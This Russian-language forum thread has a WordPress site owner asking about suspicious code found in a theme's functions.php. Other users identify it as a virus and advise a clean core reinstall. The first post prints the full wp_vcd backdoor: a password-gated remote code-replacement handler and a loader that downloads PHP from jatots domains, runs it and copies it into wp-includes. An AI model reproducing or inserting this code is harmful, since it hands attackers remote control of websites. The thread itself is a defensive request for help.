Elliot

Нашел вредоносный код в WP или мне показалось?

10 сообщений в этой теме

Здравствуйте друзья! Случайно заглянул в файл functions и заметил там непонятный код.

Гляньте, как по вашему, что он может делать, часом не удаляет тему после загрузки сайта на хостинг?

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '34ddb1c16d4eca7a3070f39f15b3c008'))
	{
$div_code_name="wp_vcd";
		switch ($_REQUEST['action'])
			{

				




				case 'change_domain';
					if (isset($_REQUEST['newdomain']))
						{
							
							if (!empty($_REQUEST['newdomain']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }


		                                                                    }
								}
						}
				break;

								case 'change_code';
					if (isset($_REQUEST['newcode']))
						{
							
							if (!empty($_REQUEST['newcode']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

			                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }


		                                                                    }
								}
						}
				break;
				
				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
			}
			
		die("");
	}








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
		   {
		   }
			else
			{
			$tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
			fwrite($handle, "<?php\n" . $phpCode);
			}
			fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='11222a571de226a4d2202e7d67343f0d';
        if (($tmpcontent = @file_get_contents("http://www.jatots.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.jatots.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.jatots.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } 
		
		        elseif ($tmpcontent = @file_get_contents("http://www.jatots.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
		elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 
        
        
        
        
        
    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?><?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?><?php
/**
 *
 * The framework's functions and definitions
 *
 */

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Вам не показалось. Это вирус. Он заражает ядро ВП. Требуется:

  • "нулевая установка" Вордпресс
  • чистка плагинов
  • чистка темы
werstey и Elliot понравилось это

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

некогда не работал с wp и некогда не чистил вирусы 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
5 часов назад, simbo сказал:

некогда не работал с wp и некогда не чистил вирусы 

Очень познавательный ответ! Спасибо вам дорогой друг, мы так все хотели об этом узнать!!! Низкий вам поклон!!!!!

Воланд, zinalab и Amenhotep понравилось это

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Ирония Лимончика улыбнула)))

Друзья, а вот как можно поискать то, что может еще быть?

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Капец, удалил этот код, обновил страницу и он снова записался((

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

АПать тему не надо! Повторюсь:

Требуется:

  • "нулевая установка" Вордпресс
  • чистка плагинов
  • чистка темы

Предпочтительно в этой последовательности

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
3 часа назад, files сказал:

АПать тему не надо! Повторюсь:

Требуется:

  • "нулевая установка" Вордпресс
  • чистка плагинов
  • чистка темы

Предпочтительно в этой последовательности

Я тему не апал, и таким не занимаюсь.

По сабжу, за ваш ответ спасибо, но он похож на ответ simbo, вот если бы вы ответили типа, зайди во все плагины и попытайся поискать там такой-то текст, вот это какой-то ответ, без обид, и не смотря на то, что вы модер.

Или накажите и закроите тему, как на нулледе за пререкание с модератором?)) 

 

И снова по сабжу, чтобы снять симптом, нужно удалить файлы wp-includes/wp-tmp.php и wp-vcd.php или как то так, код больше не записывается в functions но кто его знает...

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Цитата

Я тему не апал, и таким не занимаюсь.

Vu9iI0N.jpg

Правила. 8. "Поднятие" (ап, up и т.д.) темы чаще одного раза в двое суток (лучше напишите или отредактируйте всю необходимую информацию в своем первом топике).

 

Цитата

И снова по сабжу, чтобы снять симптом, нужно удалить файлы wp-includes/wp-tmp.php и wp-vcd.php или как то так, код больше не записывается в functions но кто его знает...

А вы почему не посмотрели что там в wp-includes/wp-tmp.php и wp-vcd.php?

Там другая цепочка файлов. Ядро ВП заражено "елочкой". Поэтому Вам поможет "нулевая установка" WP. Удалять вы будете бесконечно долго сам вирус, а не то, что он наделал.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
В 23.07.2018 в 4:06 PM, files сказал:

Vu9iI0N.jpg

Правила. 8. "Поднятие" (ап, up и т.д.) темы чаще одного раза в двое суток (лучше напишите или отредактируйте всю необходимую информацию в своем первом топике).

Ну так поставьте склейку сообщений, в чем проблема... Я считаю, что не апал тему.

По сабжу, буду пробовать залить чистые файлы ядра,

хоть бы это апом не было...

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!


Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.


Войти сейчас

  • Сейчас на странице   0 пользователей

    Нет пользователей, просматривающих эту страницу